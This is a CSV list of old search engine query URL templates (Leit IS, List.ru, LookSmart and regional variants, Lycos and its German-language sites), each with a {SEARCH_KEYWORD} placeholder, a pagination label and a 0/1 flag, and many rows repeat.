"International","Leit IS 3 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=21&nh=10&lk=1&rf=0","0"
"International","Leit IS 3 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=21&nh=10&lk=1&rf=0","0"
"International","Leit IS 4 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=31&nh=10&lk=1&rf=0","1"
"International","Leit IS 4 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=31&nh=10&lk=1&rf=0","0"
"International","Leit IS 4 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=31&nh=10&lk=1&rf=0","0"
"International","Leit IS 5 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=41&nh=10&lk=1&rf=0","1"
"International","Leit IS 5 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=41&nh=10&lk=1&rf=0","0"
"International","Leit IS 5 (Next 10)","http://leitarvel.leit.is/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&ws=0&la=&si=1&fs=&qt={SEARCH_KEYWORD}&ex=&rq=0&oq=&qm=0&ql=&st=41&nh=10&lk=1&rf=0","0"
"International","List.ru","http://search.mail.ru/RamblerSearch/mailru_ctg?words={SEARCH_KEYWORD}","0"
"International","List.ru","http://search.mail.ru/RamblerSearch/mailru_ctg?words={SEARCH_KEYWORD}","0"
"International","List.ru","http://search.mail.ru/RamblerSearch/mailru_ctg?words={SEARCH_KEYWORD}","0"
"International","List.ru","http://search.mail.ru/RamblerSearch/mailru_ctg?words={SEARCH_KEYWORD}","0"
"International","List.ru","http://search.mail.ru/RamblerSearch/mailru_ctg?words={SEARCH_KEYWORD}","0"
"International","List.ru","http://search.mail.ru/RamblerSearch/mailru_ctg?words={SEARCH_KEYWORD}","0"
"International","LookSmart","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&search=us302562;local_US","1"
"International","LookSmart","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search","0"
"International","LookSmart","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search","0"
"International","LookSmart","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&search=us302562;local_US","0"
"International","LookSmart","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&search=us302562;local_US","0"
"International","LookSmart","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=23&se=4-4,300","1"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=38&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=53&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=68&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=23&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=38&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=53&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=68&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=23&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=38&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=53&se=4-4,300","0"
"International","LookSmart 2 (Next 15)","http://search.looksmart.com/p/search?qt={SEARCH_KEYWORD}&tb=web&search=Search&sn=68&se=4-4,300","0"
"International","LookSmart 2 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=20&se=4,5,2000,0&search=us302562;local_US","0"
"International","LookSmart 2 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=20&se=4,5,2000,0&search=us302562;local_US","0"
"International","LookSmart 2 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=20&se=4,5,2000,0&search=us302562;local_US","0"
"International","LookSmart 3 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=40&se=4,5,2000,0&search=us302562;local_US","1"
"International","LookSmart 3 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=40&se=4,5,2000,0&search=us302562;local_US","0"
"International","LookSmart 3 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=40&se=4,5,2000,0&search=us302562;local_US","0"
"International","LookSmart 4 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=4,5,2000,0&search=us302562;local_US","1"
"International","LookSmart 4 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=4,5,2000,0&search=us302562;local_US","0"
"International","LookSmart 4 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=4,5,2000,0&search=us302562;local_US","0"
"International","LookSmart 5 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=80&se=4,5,2000,0&search=us302562;local_US","1"
"International","LookSmart 5 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=80&se=4,5,2000,0&search=us302562;local_US","0"
"International","LookSmart 5 (Next 20)","http://www.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=80&se=4,5,2000,0&search=us302562;local_US","0"
"International","looksmart CA","http://canada.looksmart.com/r_search?key={SEARCH_KEYWORD}","1"
"International","looksmart CA","http://canada.looksmart.com/r_search?key={SEARCH_KEYWORD}","0"
"International","looksmart CA","http://canada.looksmart.com/r_search?key={SEARCH_KEYWORD}","0"
"International","looksmart CA","http://canada.looksmart.com/r_search?key={SEARCH_KEYWORD}","0"
"International","looksmart CA","http://canada.looksmart.com/r_search?key={SEARCH_KEYWORD}","0"
"International","looksmart CA","http://canada.looksmart.com/r_search?key={SEARCH_KEYWORD}","0"
"International","looksmart CA 2 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=15&se=0,2,1000&search=us867963","1"
"International","looksmart CA 2 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=15&se=0,2,1000&search=us867963","0"
"International","looksmart CA 2 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=15&se=0,2,1000&search=us867963","0"
"International","looksmart CA 2 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=15&se=0,2,1000&search=us867963","0"
"International","looksmart CA 2 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=15&se=0,2,1000&search=us867963","0"
"International","looksmart CA 2 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=15&se=0,2,1000&search=us867963","0"
"International","looksmart CA 3 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=30&se=0,2,1000&search=us867963","1"
"International","looksmart CA 3 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=30&se=0,2,1000&search=us867963","0"
"International","looksmart CA 3 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=30&se=0,2,1000&search=us867963","0"
"International","looksmart CA 3 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=30&se=0,2,1000&search=us867963","0"
"International","looksmart CA 3 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=30&se=0,2,1000&search=us867963","0"
"International","looksmart CA 3 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=30&se=0,2,1000&search=us867963","0"
"International","looksmart CA 4 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=45&se=0,2,1000&search=us867963","1"
"International","looksmart CA 4 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=45&se=0,2,1000&search=us867963","0"
"International","looksmart CA 4 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=45&se=0,2,1000&search=us867963","0"
"International","looksmart CA 4 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=45&se=0,2,1000&search=us867963","0"
"International","looksmart CA 4 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=45&se=0,2,1000&search=us867963","0"
"International","looksmart CA 4 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=45&se=0,2,1000&search=us867963","0"
"International","looksmart CA 5 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=0,2,1000&search=us867963","1"
"International","looksmart CA 5 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=0,2,1000&search=us867963","0"
"International","looksmart CA 5 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=0,2,1000&search=us867963","0"
"International","looksmart CA 5 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=0,2,1000&search=us867963","0"
"International","looksmart CA 5 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=0,2,1000&search=us867963","0"
"International","looksmart CA 5 (Next 15)","http://canada.looksmart.com/r_search?l&key={SEARCH_KEYWORD}&skip=60&se=0,2,1000&search=us867963","0"
"International","LookSmart NZ","http://search.looksmart.co.nz/synd-nz/search/index.jsp?skip=0&catPath=707391%3B302562&key={SEARCH_KEYWORD}","1"
"International","LookSmart NZ","http://search.looksmart.co.nz/synd-nz/search/index.jsp?skip=0&catPath=707391%3B302562&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ","http://search.looksmart.co.nz/synd-nz/search/index.jsp?skip=0&catPath=707391%3B302562&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ 2 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=15&catPath=707391;302562&state=2&sx=637&ser=0;14&key={SEARCH_KEYWORD}","1"
"International","LookSmart NZ 2 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=15&catPath=707391;302562&state=2&sx=637&ser=0;14&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ 2 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=15&catPath=707391;302562&state=2&sx=637&ser=0;14&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ 3 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=30&catPath=707391;302562&state=2&sx=631&ser=0;14&key={SEARCH_KEYWORD}","1"
"International","LookSmart NZ 3 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=30&catPath=707391;302562&state=2&sx=631&ser=0;14&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ 3 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=30&catPath=707391;302562&state=2&sx=631&ser=0;14&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ 4 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=45&catPath=707391;302562&state=2&sx=626&ser=0;14&key={SEARCH_KEYWORD}","1"
"International","LookSmart NZ 4 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=45&catPath=707391;302562&state=2&sx=626&ser=0;14&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ 4 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=45&catPath=707391;302562&state=2&sx=626&ser=0;14&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ 5 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=60&catPath=707391;302562&state=2&sx=619&ser=0;14&key={SEARCH_KEYWORD}","1"
"International","LookSmart NZ 5 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=60&catPath=707391;302562&state=2&sx=619&ser=0;14&key={SEARCH_KEYWORD}","0"
"International","LookSmart NZ 5 (Next 15)","http://search.looksmart.co.nz/synd-nz/search/index.jsp?catPathIdx=1&skip=60&catPath=707391;302562&state=2&sx=619&ser=0;14&key={SEARCH_KEYWORD}","0"
"International","Lycos","http://search.lycos.com/default.asp?ca=o&query={SEARCH_KEYWORD}","1"
"International","Lycos","http://search.lycos.com/default.asp?ca=o&query={SEARCH_KEYWORD}","0"
"International","Lycos","http://search.lycos.com/default.asp?ca=o&query={SEARCH_KEYWORD}","0"
"International","Lycos","http://search.lycos.com/default.asp?ca=o&query={SEARCH_KEYWORD}","0"
"International","Lycos","http://search.lycos.com/default.asp?ca=o&query={SEARCH_KEYWORD}","0"
"International","Lycos","http://search.lycos.com/default.asp?ca=o&query={SEARCH_KEYWORD}","0"
"International","Lycos 2 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=11&page=more","1"
"International","Lycos 2 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=11&page=more","0"
"International","Lycos 2 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=11&page=more","0"
"International","Lycos 2 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=11&page=more","0"
"International","Lycos 2 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=11&page=more","0"
"International","Lycos 2 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=11&page=more","0"
"International","Lycos 3 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=21&page=more","1"
"International","Lycos 3 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=21&page=more","0"
"International","Lycos 3 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=21&page=more","0"
"International","Lycos 3 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=21&page=more","0"
"International","Lycos 3 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=21&page=more","0"
"International","Lycos 3 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=21&page=more","0"
"International","Lycos 4 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=31&page=more","1"
"International","Lycos 4 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=31&page=more","0"
"International","Lycos 4 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=31&page=more","0"
"International","Lycos 4 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=31&page=more","0"
"International","Lycos 4 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=31&page=more","0"
"International","Lycos 4 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=31&page=more","0"
"International","Lycos 5 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=41&page=more","1"
"International","Lycos 5 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=41&page=more","0"
"International","Lycos 5 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=41&page=more","0"
"International","Lycos 5 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=41&page=more","0"
"International","Lycos 5 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=41&page=more","0"
"International","Lycos 5 (Next 10)","http://search.lycos.com/default.asp?query={SEARCH_KEYWORD}&first=41&page=more","0"
"International","Lycos CH","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","1"
"International","Lycos CH","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos CH","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos CH","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos CH","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos CH","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos CH 2 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","1"
"International","Lycos CH 2 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 2 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 2 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 2 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 2 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 3 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","1"
"International","Lycos CH 3 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 3 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 3 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 3 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 3 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 4 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","1"
"International","Lycos CH 4 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 4 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 4 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 4 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 4 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","1"
"International","Lycos CH 5 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 5 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 5 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 5 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 5 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","0"
"International","Lycos CH 5 (Next 10)","http://suche.lycos.de/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=de&wh=1475&nightsurf=no","1"
"International","Lycos DE","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","1"
"International","Lycos DE","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos DE","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos DE","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos DE","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos DE","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos DE 2 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","1"
"International","Lycos DE 2 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 2 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 2 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 2 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 2 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 3 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","1"
"International","Lycos DE 3 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 3 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 3 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 3 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 3 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 4 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","1"
"International","Lycos DE 4 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 4 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 4 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 4 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 4 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
"International","Lycos DE 5 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","1"
"International","Lycos DE 5 (Next 10)","http://suche.lycos.at/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=at&wh=947417&nightsurf=no","0"
